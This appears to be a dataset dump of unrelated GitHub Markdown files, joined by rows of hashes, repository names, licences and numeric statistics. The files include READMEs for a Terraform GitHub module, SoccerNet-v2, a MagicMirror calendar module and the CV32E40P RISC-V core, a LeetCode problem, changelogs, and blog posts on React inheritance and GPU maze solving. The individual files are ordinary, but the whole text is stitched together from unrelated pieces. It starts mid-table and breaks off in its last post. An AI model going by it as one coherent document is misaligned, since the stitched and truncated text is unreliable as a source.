| private | (Optional) Set to true to create a private repository. Repositories are created as public (e.g. open source) by default. | string | `"false"` | no |
| required\_pull\_request\_reviews | (Optional) Enforce restrictions for pull request reviews. | list | `<list>` | no |
| required\_status\_checks | (Optional) Enforce restrictions for required status checks. | list | `<list>` | no |
| restrictions | (Optional) Enforce restrictions for the users and teams that may push to the branch. | list | `<list>` | no |
| team\_slug | (Required) The GitHub team slug | string | `""` | yes |
| topics | (Optional) The list of topics of the repository. | list | `<list>` | no |
## Outputs
| Name | Description |
|------|-------------|
| full\_name | A string of the form \"orgname/reponame\". |
| git\_clone\_url | URL that can be provided to `git clone` to clone the repository anonymously via the git protocol. |
| html\_url | URL to the repository on the web. |
| http\_clone\_url | URL that can be provided to `git clone` to clone the repository via HTTPS. |
| ssh\_clone\_url | URL that can be provided to `git clone` to clone the repository via SSH. |
| svn\_url | URL that can be provided to svn checkout to check out the repository via GitHub's Subversion protocol emulation. |
| 61.670213 | 442 | 0.712265 | eng_Latn | 0.994418 |
61cd5bb11f2e03d4c1337f632af818ca3d03e7c3 | 4,392 | md | Markdown | README.md | SilvioGiancola/SoccerNetv2-DevK | fb078911573409f48b85ee854dc8f09f432ee3a6 | [
"MIT"
] | 4 | 2022-01-30T07:37:13.000Z | 2022-02-05T10:31:05.000Z | README.md | SilvioGiancola/SoccerNetv2-DevK | fb078911573409f48b85ee854dc8f09f432ee3a6 | [
"MIT"
] | null | null | null | README.md | SilvioGiancola/SoccerNetv2-DevK | fb078911573409f48b85ee854dc8f09f432ee3a6 | [
"MIT"
] | null | null | null | # SoccerNetv2-DevKit
Welcome to the SoccerNet-V2 Development Kit for the SoccerNet Benchmark and Challenge. This kit is meant as a help to get started working with the soccernet data and the proposed tasks. More information about the dataset can be found on our [official website](https://soccer-net.org/).
SoccerNet-v2 is an extension of SoccerNet-v1 with new and challenging tasks including
action spotting, camera shot segmentation with boundary detection, and a novel replay grounding task.
<p align="center"><img src="Images/GraphicalAbstract-SoccerNet-V2-1.png" width="640"></p>
The dataset consists of 500 complete soccer games including:
- Full untrimmed broadcast videos in both low and high resolution.
- Pre-computed features such as ResNET-152.
- Annotations of actions among 17 classes (Labels-v2.json).
- Annotations of camera replays linked to actions (Labels-cameras.json).
- Annotations of camera changes and camera types for 200 games (Labels-cameras.json).
Participate in our upcoming Challenge in the [CVPR 2021 International Challenge on Activity Recognition Workshop](http://activity-net.org/challenges/2021/index.html) and try to win up to 1000$ sponsored by [Second Spectrum](https://www.secondspectrum.com/index.html)! All details can be found on the [challenge website](https://eval.ai/web/challenges/challenge-page/761/overview), or on the [main page](https://soccer-net.org/).
The participation deadline is fixed at the 30th of May 2021.
The official rules and guidelines are available on [ChallengeRules.md](ChallengeRules.md).
<a href="https://youtu.be/T8Qc39FcQ7A">
<p align="center"><img src="Images/Miniature.png" width="720"></p>
</a>
## How to download SoccerNet-v2
A [SoccerNet pip package](https://pypi.org/project/SoccerNet/) to easily download the data and the annotations is available.
To install the pip package simply run:
<code>pip install SoccerNet</code>
Please follow the instructions provided in the [Download](Download) folder of this repository. Do also mind that signing an Non-Disclosure agreement (NDA) is required to access the LQ and HQ videos: [NDA](https://docs.google.com/forms/d/e/1FAIpQLSfYFqjZNm4IgwGnyJXDPk2Ko_lZcbVtYX73w5lf6din5nxfmA/viewform).
## How to extract video features
As it was one of the most requested features on SoccerNet-V1, this repository provides functions to automatically extract the ResNet-152 features and compute the PCA on your own broadcast videos. These functions allow you to test pre-trained action spotting, camera segmentation or replay grounding models on your own games.
The functions to extract the video features can be found in the [Features](Features) folder.
<p align="center"><img src="Images/Videos_and_features.png" width="720"></p>
## Baseline Implementations
This repository contains several baselines for each task which are presented in the [SoccerNet-V2 paper](https://arxiv.org/pdf/2011.13367.pdf), or subsequent papers. You can use these codes to build upon our methods and improve the performances.
- Action Spotting [[Link]](Task1-ActionSpotting)
- Camera Shot Segmentation [[Link]](Task2-CameraShotSegmentation)
- Replay Grounding [[Link]](Task3-ReplayGrounding)
## Evaluation
This repository and the pip package provide evaluation functions for the three proposed tasks based on predictions saved in the JSON format. See the [Evaluation](Evaluation) folder of this repository for more details.
## Visualizations
Finally, this repository provides the [Annotation tool](Annotation) used to annotate the actions, the camera types and the replays. This tool can be used to visualize the information. Please follow the instruction in the dedicated folder for more details.
## Citation
For further information check out the paper and supplementary material:
https://arxiv.org/abs/2011.13367
Please cite our work if you use our dataset:
```bibtex
@InProceedings{Deliège2020SoccerNetv2,
title={SoccerNet-v2 : A Dataset and Benchmarks for Holistic Understanding of Broadcast Soccer Videos},
author={Adrien Deliège and Anthony Cioppa and Silvio Giancola and Meisam J. Seikavandi and Jacob V. Dueholm and Kamal Nasrollahi and Bernard Ghanem and Thomas B. Moeslund and Marc Van Droogenbroeck},
year={2021},
booktitle = {The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) Workshops},
month = {June},
}
```
| 57.038961 | 428 | 0.783925 | eng_Latn | 0.981006 |
61ce8fd3925499d607ce1d2efebb9d8be35759ed | 2,544 | md | Markdown | README.md | MPPexcellent/MMM-CalendarExtTimeline | bb0f6f86527600df69404ad45ad06acbcb9d0b2d | [
"MIT"
] | 7 | 2020-06-13T12:28:20.000Z | 2022-02-12T13:28:28.000Z | README.md | MPPexcellent/MMM-CalendarExtTimeline | bb0f6f86527600df69404ad45ad06acbcb9d0b2d | [
"MIT"
] | 7 | 2020-05-28T03:52:14.000Z | 2022-02-01T10:16:45.000Z | README.md | MPPexcellent/MMM-CalendarExtTimeline | bb0f6f86527600df69404ad45ad06acbcb9d0b2d | [
"MIT"
] | 5 | 2020-09-16T16:26:28.000Z | 2022-01-14T11:14:32.000Z | # MMM-CalendarExtTimeline
Display current timeline schedules. This is a plugin module for `MMM-CalendarExt`and `MMM-CalendarExt2`
## Screenshot ##

## Installation ##
**`MMM-CalendarExt` should be installed together for using this module.**
**You should update your `MMM-CalendarExt`(new version after November 4,2017) before using this.**
```shell
cd <your MagicMirror Directory>/modules
git clone https://github.com/eouia/MMM-CalendarExtTimeline
```
## Update ##
**2018-12-19**
- `MMM-CalendarExt2` supported.
## Configuration ##
```javascript
{
module:"MMM-CalendarExtTimeline",
position:"bottom_bar",
config: {
type: "static", // "static", "dynamic"
refresh_interval_sec: 60, // minimum 60,
table_title_format: "ddd, MMM Do",
begin_hour: 0, //ignored when you set type to 'dynamic'
end_hour: 6, //how many hours to show.
fromNow: 0, // add this many days to today's current date, e.g., 1 is tomorrow, -1 is yesterday
time_display_section_count: 6,
time_display_section_format: "HH:mm",
calendars: ["your calendar name", "another name"] //in your `MMM-CalendarExt` configuration
source: "CALEXT2", // or "CALEXT"
}
}
```
### type:"static" or "dynamic"
#### type:"static"
This will show timeline from `begin_hour` to `end_hour` of today.
By example)
```javascript
type:"static",
begin_hour: 6,
end_hour: 18,
```
will show timeline of schedule which goes from 6:00 to 18:00 today.
#### type:"dynamic"
This will show timeline from `this hour` during `end_hour` now.
```javascript
type:"dynamic",
end_hour: 6,
```
If current time be 13:45, This would show schedules which goes from 13:00 to 19:00. The view will be changed automatically by time.
`begin_hour` will be ignored when type is set to `dynamic`.
### transform
See [Transforming in MMM-CalendarExt2](https://github.com/MMM-CalendarExt2/MMM-CalendarExt2/blob/master/docs/Filtering-and-Sorting.md#transforming). A `transform` key can be added to the MMM-CalendarExtTimeline config in the same way, for example:
```javascript
transform: (event) => {
if (event.title.includes("Meeting")) {
event.styleName = "meeting-style" // Change the CSS class name to highlight meetings
}
return event
}
```
### I just want to display only this module, not `MMM-CalendarExt` ###
In your configuration of `MMM-CalendarExt`, modify this.
```javascript
config: {
system: {
show: [], // set this field blank.
```
| 31.407407 | 247 | 0.711478 | eng_Latn | 0.930298 |
61ceffb65285eeab6abacfc2f0bdf1d7ed4dcac7 | 3,824 | md | Markdown | rtl/vendor/openhwgroup_cv32e40p/README.md | veronia-iskandar/core-v-mcu | 145a458344ce14b4cc0858ded3e684b73a296e97 | [
"Apache-2.0"
] | 1 | 2021-06-23T19:49:05.000Z | 2021-06-23T19:49:05.000Z | rtl/vendor/openhwgroup_cv32e40p/README.md | veronia-iskandar/core-v-mcu | 145a458344ce14b4cc0858ded3e684b73a296e97 | [
"Apache-2.0"
] | 10 | 2021-05-12T20:26:26.000Z | 2021-07-16T21:27:45.000Z | rtl/vendor/openhwgroup_cv32e40p/README.md | veronia-iskandar/core-v-mcu | 145a458344ce14b4cc0858ded3e684b73a296e97 | [
"Apache-2.0"
] | 1 | 2021-03-03T17:29:09.000Z | 2021-03-03T17:29:09.000Z | [](https://travis-ci.com/pulp-platform/riscv)
# OpenHW Group CORE-V CV32E40P RISC-V IP
CV32E40P is a small and efficient, 32-bit, in-order RISC-V core with a 4-stage pipeline that implements
the RV32IM\[F\]C instruction set architecture, and the Xpulp custom extensions for achieving
higher code density, performance, and energy efficiency \[[1](https://doi.org/10.1109/TVLSI.2017.2654506)\], \[[2](https://doi.org/10.1109/PATMOS.2017.8106976)\].
It started its life as a fork of the OR10N CPU core that is based on the OpenRISC ISA.
Then, under the name of RI5CY, it became a RISC-V core (2016), and it has been maintained
by the [PULP platform](https://www.pulp-platform.org/) team until February 2020,
when it has been contributed to [OpenHW Group](https://www.openhwgroup.org/).
## Documentation
The CV32E40P user manual can be found in the _docs_ folder and it is
captured in reStructuredText, rendered to html using [Sphinx](https://docs.readthedocs.io/en/stable/intro/getting-started-with-sphinx.html).
These documents are viewable using readthedocs and can be viewed [here](https://cv32e40p.readthedocs.io/en/latest/).
## Verification
The verification environment for the CV32E40P is _not_ in this Repository. There is a small, simple testbench here which is
useful for experimentation only and should not be used to validate any changes to the RTL prior to pushing to the master
branch of this repo.
The verification environment for this core as well as other cores in the OpenHW Group CORE-V family is at the
[core-v-verif](https://github.com/openhwgroup/core-v-verif) repository on GitHub.
The Makefiles supported in the **core-v-verif** project automatically clone the appropriate version of the **cv32e40p** RTL sources.
## Constraints
Example synthesis constraints for the CV32E40P are provided.
## Contributing
We highly appreciate community contributions. We are currently using the lowRISC contribution guide.
To ease our work of reviewing your contributions,
please:
* Create your own fork to commit your changes and then open a Pull Request.
* Split large contributions into smaller commits addressing individual changes or bug fixes. Do not
mix unrelated changes into the same commit!
* Write meaningful commit messages. For more information, please check out the [the Ibex contribution
guide](https://github.com/lowrisc/ibex/blob/master/CONTRIBUTING.md).
* If asked to modify your changes, do fixup your commits and rebase your branch to maintain a
clean history.
When contributing SystemVerilog source code, please try to be consistent and adhere to [the lowRISC Verilog
coding style guide](https://github.com/lowRISC/style-guides/blob/master/VerilogCodingStyle.md).
To get started, please check out the ["Good First Issue"
list](https://github.com/openhwgroup/cv32e40p/issues?q=is%3Aissue+is%3Aopen+-label%3Astatus%3Aresolved+label%3A%22good+first+issue%22).
## Issues and Troubleshooting
If you find any problems or issues with CV32E40P or the documentation, please check out the [issue
tracker](https://github.com/openhwgroup/cv32e40p/issues) and create a new issue if your problem is
not yet tracked.
## References
1. [Gautschi, Michael, et al. "Near-Threshold RISC-V Core With DSP Extensions for Scalable IoT Endpoint Devices."
in IEEE Transactions on Very Large Scale Integration (VLSI) Systems, vol. 25, no. 10, pp. 2700-2713, Oct. 2017](https://doi.org/10.1109/TVLSI.2017.2654506)
2. [Schiavone, Pasquale Davide, et al. "Slow and steady wins the race? A comparison of
ultra-low-power RISC-V cores for Internet-of-Things applications."
_27th International Symposium on Power and Timing Modeling, Optimization and Simulation
(PATMOS 2017)_](https://doi.org/10.1109/PATMOS.2017.8106976)
| 55.42029 | 162 | 0.781904 | eng_Latn | 0.964374 |
61cf4b6f6a9e018ecd345121ae9f69be2c546476 | 861 | md | Markdown | solve/solve0414/problem.md | Mary526/algo-javascript | 726645e8b44c5ce248000394a9efb1a2d44c4e26 | [
"MIT"
] | null | null | null | solve/solve0414/problem.md | Mary526/algo-javascript | 726645e8b44c5ce248000394a9efb1a2d44c4e26 | [
"MIT"
] | null | null | null | solve/solve0414/problem.md | Mary526/algo-javascript | 726645e8b44c5ce248000394a9efb1a2d44c4e26 | [
"MIT"
] | null | null | null | # [414. 第三大的数](https://leetcode-cn.com/problems/third-maximum-number/)
<p>给你一个非空数组,返回此数组中 <strong>第三大的数</strong> 。如果不存在,则返回数组中最大的数。</p>
<p> </p>
<p><strong>示例 1:</strong></p>
<pre>
<strong>输入:</strong>[3, 2, 1]
<strong>输出:</strong>1
<strong>解释:</strong>第三大的数是 1 。</pre>
<p><strong>示例 2:</strong></p>
<pre>
<strong>输入:</strong>[1, 2]
<strong>输出:</strong>2
<strong>解释:</strong>第三大的数不存在, 所以返回最大的数 2 。
</pre>
<p><strong>示例 3:</strong></p>
<pre>
<strong>输入:</strong>[2, 2, 3, 1]
<strong>输出:</strong>1
<strong>解释:</strong>注意,要求返回第三大的数,是指在所有不同数字中排第三大的数。
此例中存在两个值为 2 的数,它们都排第二。在所有不同数字中排第三大的数为 1 。</pre>
<p> </p>
<p><strong>提示:</strong></p>
<ul>
<li><code>1 <= nums.length <= 10<sup>4</sup></code></li>
<li><code>-2<sup>31</sup> <= nums[i] <= 2<sup>31</sup> - 1</code></li>
</ul>
<p> </p>
<p><strong>进阶:</strong>你能设计一个时间复杂度 <code>O(n)</code> 的解决方案吗?</p>
| 20.023256 | 71 | 0.614402 | yue_Hant | 0.175943 |
61cf8a01ecf2a6bbb4772ea6fbe9f1ab14c0cb51 | 4,393 | md | Markdown | _posts/2015-10-15-how-to-implement-inheritance-in-reactjs.md | mazong1123/jekyll-now | 8282b4c564bac5aa02a5fc842939ab1ef1b03531 | [
"MIT"
] | 1 | 2016-07-13T08:52:59.000Z | 2016-07-13T08:52:59.000Z | _posts/2015-10-15-how-to-implement-inheritance-in-reactjs.md | mazong1123/jekyll-now | 8282b4c564bac5aa02a5fc842939ab1ef1b03531 | [
"MIT"
] | null | null | null | _posts/2015-10-15-how-to-implement-inheritance-in-reactjs.md | mazong1123/jekyll-now | 8282b4c564bac5aa02a5fc842939ab1ef1b03531 | [
"MIT"
] | null | null | null | ---
layout: post
title: How to implement inheritance in react.js.
date: 2015-10-13 14:19
author: mazong1123
comments: true
categories: [Uncategorized]
published: true
---
[React.js](https://facebook.github.io/react/) is a great library to build view in component way. However, one thing makes me frustrated is
there's no inheritance support by using React.createClass() to create a react component. A "Class" cannot be inheritied! Facebook
now recommend us using [High order components](https://medium.com/@dan_abramov/mixins-are-dead-long-live-higher-order-components-94a0d2f9e750) to
address code reusable issue, which makes me more frustrated. OK, I'm an old school object oriented guy. I just want something in classic: Class inheritance and overriding.
That's why I developed [ReactOO](https://github.com/mazong1123/reactoo). By leveraging ReactOO, we can build react component in a classic
OO way. Following is an example to build a simple Button component:
window.ButtonClass = window.ReactOO.ReactBase.extend({
getReactDisplayName: function () {
return 'Button';
},
onReactRender: function (reactInstance) {
var self = this;
var text = reactInstance.props.text;
return React.createElement('button', self.getButtonProperty(reactInstance), text);
},
getButtonProperty: function (reactInstance) {
return {};
}
});
var button = new window.ButtonClass();
button.render({ text: 'Button' }, '#normalButton');
Now everything looks more classic. At first, we defined a ButtonClass, which inherits from the base window.ReactOO.ReactBase class. Then we created an instance of ButtonClass and call its render() method to render itself to an element with 'normalButton' id.
You probably noticed the **getButtonPropery** method. It can be overrided in the subclass, and the Button property could be changed. Nothing new, just overriding in the OO way. Let's build a StyledButtonClass in this manner:
window.StyledButtonClass = window.ButtonClass.extend({
getReactDisplayName: function () {
return 'StyledButton';
},
getButtonProperty: function (reactInstance) {
var self = this;
var property = self._super();
property.className = 'nice-button';
return property;
}
});
var styledButton = new window.StyledButtonClass();
styledButton.render({ text: 'Styled Button' }, '#styledButton');
StyledButtonClass inherits from ButtonClass, overrides the **getButtonProperty** to add a **className** property. Done. Pretty simple huh?
How about add some interactions? Let's build a button with click handler and styled:
window.StyledButtonWithClickHandlerClass = window.StyledButtonClass.extend({
getReactDisplayName: function () {
return 'StyledButtonWithClickHandler';
},
getButtonProperty: function (reactInstance) {
var self = this;
var property = self._super();
property.onClick = reactInstance.handleClick;
return property;
},
onReactHandleClick: function (reactInstance, e) {
e.preventDefault();
alert('Clicked!');
}
});
var styledButtonWithClickHandler = new window.StyledButtonWithClickHandlerClass();
styledButtonWithClickHandler.render({ text: 'Styled Button With Click Handler' }, '#styledButtonWithClickHandler');
This time, we defined a class StyledButtonWithClickHandlerClass which inherits from StyledButtonClass, overrided **getButtonProperty** method to add an onClick property. And then overrided **onReactHandleClick** method to provide the click handler code. That's it.
Please note for any [react life cycle methods](https://facebook.github.io/react/docs/component-specs.html) or javascript event handler (e.g: onClick, onSubmit), ReactOO provides built-in handler method in onReactxxx manner. A reactInstance can be used as a input parameter when you override these methods. [Please read the code sample and documentation for more details](https://github.com/mazong1123/reactoo).
[Another example on StackOverflow](http://stackoverflow.com/a/33139559/2719128)
Any bug or thoughts, please create an issue on [github](https://github.com/mazong1123/reactoo). Thanks :)
| 44.826531 | 410 | 0.71227 | eng_Latn | 0.862304 |
61d05f92be6b01dd07d876f0534f7c0d1efac085 | 1,404 | md | Markdown | docs/README.md | draghuram/kubedr | f8891e8ffe76a909b8d50be565064dc6ed1fbee1 | [
"Apache-2.0"
] | 65 | 2020-01-15T22:41:14.000Z | 2021-12-27T11:25:27.000Z | docs/README.md | draghuram/kubedr | f8891e8ffe76a909b8d50be565064dc6ed1fbee1 | [
"Apache-2.0"
] | 5 | 2020-01-27T22:12:06.000Z | 2020-02-11T19:13:04.000Z | docs/README.md | draghuram/kubedr | f8891e8ffe76a909b8d50be565064dc6ed1fbee1 | [
"Apache-2.0"
] | 7 | 2020-01-23T15:15:40.000Z | 2021-08-05T05:07:19.000Z | # KubeDR Docs
The documentation for *KubeDR* is divided into two guides
- [User Guide](https://catalogicsoftware.com/clab-docs/kubedr/userguide)
- [Developer Guide](https://catalogicsoftware.com/clab-docs/kubedr/devguide)
We use [Sphinx](http://www.sphinx-doc.org/en/master/) to format and
build the documentation. The guides use
[Read the Docs](https://github.com/readthedocs/sphinx_rtd_theme)
theme.
## Installation
Here is one way to install Sphinx.
```bash
$ python3 -m venv ~/venv/sphinx
$ export PATH=~/venv/sphinx/bin:$PATH
$ pip install sphinx sphinx_rtd_theme
# For local builds, this helps in continuous build and refresh.
$ pip install sphinx-autobuild
```
## Build
```bash
$ cd docs/devguide
$ make html
```
This will generate HTML files in the directory ``html``. If you are
making changes locally and would like to automatically build and
refresh the generated files, use the following build command:
```bash
$ cd docs/devguide
$ sphinx-autobuild source build/html
```
## Guidelines
- The format for the documentation is
[reStructuredText](http://www.sphinx-doc.org/en/master/usage/restructuredtext/index.html).
- The source for docs should be readable in text form so please keep
lines short (80 chars). This will also help in checking diffs.
- Before checkin in or submitting a PR, please build locally and
confirm that there are no errors or warnings from Sphinx.
| 27 | 92 | 0.75641 | eng_Latn | 0.938346 |
61d09a43bc724004c855eb39c08229ec4bfc3dc8 | 959 | md | Markdown | packages/transducers-binary/CHANGELOG.md | stwind/umbrella | ba3cbfdd8b64fff4311352763e8f0bcbb9b20fd7 | [
"Apache-2.0"
] | null | null | null | packages/transducers-binary/CHANGELOG.md | stwind/umbrella | ba3cbfdd8b64fff4311352763e8f0bcbb9b20fd7 | [
"Apache-2.0"
] | null | null | null | packages/transducers-binary/CHANGELOG.md | stwind/umbrella | ba3cbfdd8b64fff4311352763e8f0bcbb9b20fd7 | [
"Apache-2.0"
] | null | null | null | # Change Log
All notable changes to this project will be documented in this file.
See [Conventional Commits](https://conventionalcommits.org) for commit guidelines.
# [0.2.0](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2019-02-15)
### Bug Fixes
* **transducers-binary:** update juxt import ([77ed4c5](https://github.com/thi-ng/umbrella/commit/77ed4c5))
### Features
* **transducers-binary:** add utf8Length() ([7cf98ef](https://github.com/thi-ng/umbrella/commit/7cf98ef))
## [0.1.1](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2019-02-10)
**Note:** Version bump only for package @thi.ng/transducers-binary
# 0.1.0 (2019-02-05)
### Features
* **transducers-binary:** extract as new pkg from [@thi](https://github.com/thi).ng/transducers ([02877c7](https://github.com/thi-ng/umbrella/commit/02877c7))
| 26.638889 | 158 | 0.711157 | yue_Hant | 0.555181 |
61d0ba12d293c9ad59632573f009de3b8ae1e489 | 1,954 | md | Markdown | _posts/2016-11-15-enthralled-with-fall.md | jonroler/allison | cb7f82abc4500b2e6b3bb74697e0c36114f8fb8b | [
"Apache-2.0"
] | null | null | null | _posts/2016-11-15-enthralled-with-fall.md | jonroler/allison | cb7f82abc4500b2e6b3bb74697e0c36114f8fb8b | [
"Apache-2.0"
] | null | null | null | _posts/2016-11-15-enthralled-with-fall.md | jonroler/allison | cb7f82abc4500b2e6b3bb74697e0c36114f8fb8b | [
"Apache-2.0"
] | null | null | null | ---
title: Enthralled with Fall
date: 2016-11-15 00:00:00 -07:00
categories:
- whats-blooming
layout: post
blog-banner: whats-blooming-now-fall.jpg
post-date: November 15, 2016
post-time: 11:03 AM
blog-image: 2016-11-15-wbn.jpg
---
<div class="text-center">Come enjoy the sweater weather in this November. You are sure to be captivated by the Garden's vibrance.</div>
<div class="text-center">
<img src="/images/blogs/Mahonia%20repens%20Fall%20Foliage%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Oregon Grape <i>Mahonia repens</i></p>
<p>This small shrub appears to be on fire when struck by the sun.</p>
</div>
<div class="text-center">
<img src="/images/blogs/Symphoricarpos%20%27Bokrabright%27%20Fruit%20HMS16.jpg" width="560" height="935" alt="" title="" />
<p>Bright Fantasy™ Snowberry <i>Symphoricarpos</i> 'Bokrabright'</p>
<p>Along the Orangerie Boardwalk, this bush is brimming with fruit!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Viburnum%20carlesii%20Leaves%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Koreanspice Viburnum <i> Viburnum carlesii</i></p>
<p>What fantastic red leaves!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Rosa%20%27KORbin%27%20Flower%20HMS16.jpg" width="560" height="370" alt="" title="" />
<p>Iceberg Rose <i>Rosa</i> 'KORbin'</p>
<p>This elegant beauty is still in full bloom!</p>
</div>
<div class="text-center">
<img src="/images/blogs/Pyrus%20communis%20%27Bartlett%27%20Fall%20Foliage%20HMS16.jpg" width="560" height="420" alt="" title="" />
<p>Bartlett Pear <i>Pyrus communis</i> 'Bartlett'</p>
</div>
<div class="text-center">The Pear Arbor is sure colorful right now!</div>
<div class="text-center">This sunny weather won't last much longer, so don't delay your visit to the Garden.</div>
<h5 class="text-center green">Photos by Heidi Simper</h5> | 32.032787 | 135 | 0.702661 | eng_Latn | 0.528487 |
61d0f2ed763f09501f8288584eaa88a2dfcdf125 | 9,805 | markdown | Markdown | _posts/2014-06-22-A-GPU-Approach-to-Path-Finding.markdown | vincentbernat/skeeto.github.com | a7c2f743e667c2eab98fc6a163d70a0d3757fdb3 | [
"Unlicense"
] | null | null | null | _posts/2014-06-22-A-GPU-Approach-to-Path-Finding.markdown | vincentbernat/skeeto.github.com | a7c2f743e667c2eab98fc6a163d70a0d3757fdb3 | [
"Unlicense"
] | null | null | null | _posts/2014-06-22-A-GPU-Approach-to-Path-Finding.markdown | vincentbernat/skeeto.github.com | a7c2f743e667c2eab98fc6a163d70a0d3757fdb3 | [
"Unlicense"
] | null | null | null | ---
title: A GPU Approach to Path Finding
layout: post
date: 2014-06-22T22:51:46Z
tags: [ai, webgl, javascript, gpgpu, opengl]
uuid: 29de5cb3-f93a-3e6e-9adc-ff689e736877
---
Last time [I demonstrated how to run Conway's Game of Life][gol]
entirely on a graphics card. This concept can be generalized to *any*
cellular automaton, including automata with more than two states. In
this article I'm going to exploit this to solve the [shortest path
problem][spp] for two-dimensional grids entirely on a GPU. It will be
just as fast as traditional searches on a CPU.
The JavaScript side of things is essentially the same as before — two
textures with fragment shader in between that steps the automaton
forward — so I won't be repeating myself. The only parts that have
changed are the cell state encoding (to express all automaton states)
and the fragment shader (to code the new rules).
* [Online Demo](http://skeeto.github.io/webgl-path-solver/)
([source](https://github.com/skeeto/webgl-path-solver))
Included is a pure JavaScript implementation of the cellular
automaton (State.js) that I used for debugging and experimentation,
but it doesn't actually get used in the demo. A fragment shader
(12state.frag) encodes the full automaton rules for the GPU.
### Maze-solving Cellular Automaton
There's a dead simple 2-state cellular automaton that can solve any
*perfect* maze of arbitrary dimension. Each cell is either OPEN or a
WALL, only 4-connected neighbors are considered, and there's only one
rule: if an OPEN cell has only one OPEN neighbor, it becomes a WALL.

On each step the dead ends collapse towards the solution. In the above
GIF, in order to keep the start and finish from collapsing, I've added
a third state (red) that holds them open. On a GPU, you'd have to do
as many draws as the length of the longest dead end.
A perfect maze is a maze where there is exactly one solution. This
technique doesn't work for mazes with multiple solutions, loops, or
open spaces. The extra solutions won't collapse into one, let alone
the shortest one.

To fix this we need a more advanced cellular automaton.
### Path-solving Cellular Automaton
I came up with a 12-state cellular automaton that can not only solve
mazes, but will specifically find the shortest path. Like above, it
only considers 4-connected neighbors.
* OPEN (white): passable space in the maze
* WALL (black): impassable space in the maze
* BEGIN (red): starting position
* END (red): goal position
* FLOW (green): flood fill that comes in four flavors: north, east, south, west
* ROUTE (blue): shortest path solution, also comes in four flavors
If we wanted to consider 8-connected neighbors, everything would be
the same, but it would require 20 states (n, ne, e, se, s, sw, w, nw)
instead of 12. The rules are still pretty simple.
* WALL and ROUTE cells never change state.
* OPEN becomes FLOW if it has any adjacent FLOW cells. It points
towards the neighboring FLOW cell (n, e, s, w).
* END becomes ROUTE if adjacent to a FLOW cell. It points towards the
FLOW cell (n, e, s, w). This rule is important for preventing
multiple solutions from appearing.
* FLOW becomes ROUTE if adjacent to a ROUTE cell that points towards
it. Combined with the above rule, it means when a FLOW cell touches
a ROUTE cell, there's a cascade.
* BEGIN becomes ROUTE when adjacent to a ROUTE cell. The direction is
unimportant. This rule isn't strictly necessary but will come in
handy later.
This can be generalized for cellular grids of any arbitrary dimension,
and it could even run on a GPU for higher dimensions, limited
primarily by the number of texture uniform bindings (2D needs 1
texture binding, 3D needs 2 texture bindings, 4D needs 8 texture
bindings ... I think). But if you need to find the shortest path along
a five-dimensional grid, I'd like to know why!
So what does it look like?

FLOW cells flood the entire maze. Branches of the maze are search in
parallel as they're discovered. As soon as an END cell is touched, a
ROUTE is traced backwards along the flow to the BEGIN cell. It
requires double the number of steps as the length of the shortest
path.
Note that the FLOW cell keep flooding the maze even after the END was
found. It's a cellular automaton, so there's no way to communicate to
these other cells that the solution was discovered. However, when
running on a GPU this wouldn't matter anyway. There's no bailing out
early before all the fragment shaders have run.
What's great about this is that we're not limited to mazes whatsoever.
Here's a path through a few connected rooms with open space.

#### Maze Types
The worst-case solution is the longest possible shortest path. There's
only one frontier and running the entire automaton to push it forward
by one cell is inefficient, even for a GPU.

The way a maze is generated plays a large role in how quickly the
cellular automaton can solve it. A common maze generation algorithm
is a random depth-first search (DFS). The entire maze starts out
entirely walled in and the algorithm wanders around at random plowing
down walls, but never breaking into open space. When it comes to a
dead end, it unwinds looking for new walls to knock down. This methods
tends towards long, winding paths with a low branching factor.
The mazes you see in the demo are Kruskal's algorithm mazes. Walls are
knocked out at random anywhere in the maze, without breaking the
perfect maze rule. It has a much higher branching factor and makes for
a much more interesting demo.
#### Skipping the Route Step
On my computers, with a 1023x1023 Kruskal maze <del>it's about an
order of magnitude slower</del> (see update below) than [A\*][astar]
([rot.js's version][rot]) for the same maze. <del>Not very
impressive!</del> I *believe* this gap will close with time, as GPUs
become parallel faster than CPUs get faster. However, there's
something important to consider: it's not only solving the shortest
path between source and goal, **it's finding the shortest path between
the source and any other point**. At its core it's a [breadth-first
grid search][bfs].
*Update*: One day after writing this article I realized that
`glReadPixels` was causing a gigantic bottlebeck. By only checking for
the end conditions once every 500 iterations, this method is now
equally fast as A* on modern graphics cards, despite taking up to an
extra 499 iterations. **In just a few more years, this technique
should be faster than A*.**
Really, there's little use in ROUTE step. It's a poor fit for the GPU.
It has no use in any real application. I'm using it here mainly for
demonstration purposes. If dropped, the cellular automaton would
become 6 states: OPEN, WALL, and four flavors of FLOW. Seed the source
point with a FLOW cell (arbitrary direction) and run the automaton
until all of the OPEN cells are gone.
### Detecting End State
The ROUTE cells do have a useful purpose, though. How do we know when
we're done? We can poll the BEGIN cell to check for when it becomes a
ROUTE cell. Then we know we've found the solution. This doesn't
necessarily mean all of the FLOW cells have finished propagating,
though, especially in the case of a DFS-maze.
In a CPU-based solution, I'd keep a counter and increment it every
time an OPEN cell changes state. The the counter doesn't change after
an iteration, I'm done. OpenGL 4.2 introduces an [atomic
counter][atom] that could serve this role, but this isn't available in
OpenGL ES / WebGL. The only thing left to do is use `glReadPixels` to
pull down the entire thing and check for end state on the CPU.
The original 2-state automaton above also suffers from this problem.
### Encoding Cell State
Cells are stored per pixel in a GPU texture. I spent quite some time
trying to brainstorm a clever way to encode the twelve cell states
into a vec4 color. Perhaps there's some way to [exploit
blending][blend] to update cell states, or make use of some other kind
of built-in pixel math. I couldn't think of anything better than a
straight-forward encoding of 0 to 11 into a single color channel (red
in my case).
~~~glsl
int state(vec2 offset) {
vec2 coord = (gl_FragCoord.xy + offset) / scale;
vec4 color = texture2D(maze, coord);
return int(color.r * 11.0 + 0.5);
}
~~~
This leaves three untouched channels for other useful information. I
experimented (uncommitted) with writing distance in the green channel.
When an OPEN cell becomes a FLOW cell, it adds 1 to its adjacent FLOW
cell distance. I imagine this could be really useful in a real
application: put your map on the GPU, run the cellular automaton a
sufficient number of times, pull the map back off (`glReadPixels`),
and for every point you know both the path and total distance to the
source point.
### Performance
As mentioned above, I ran the GPU maze-solver against A* to test its
performance. I didn't yet try running it against Dijkstra’s algorithm
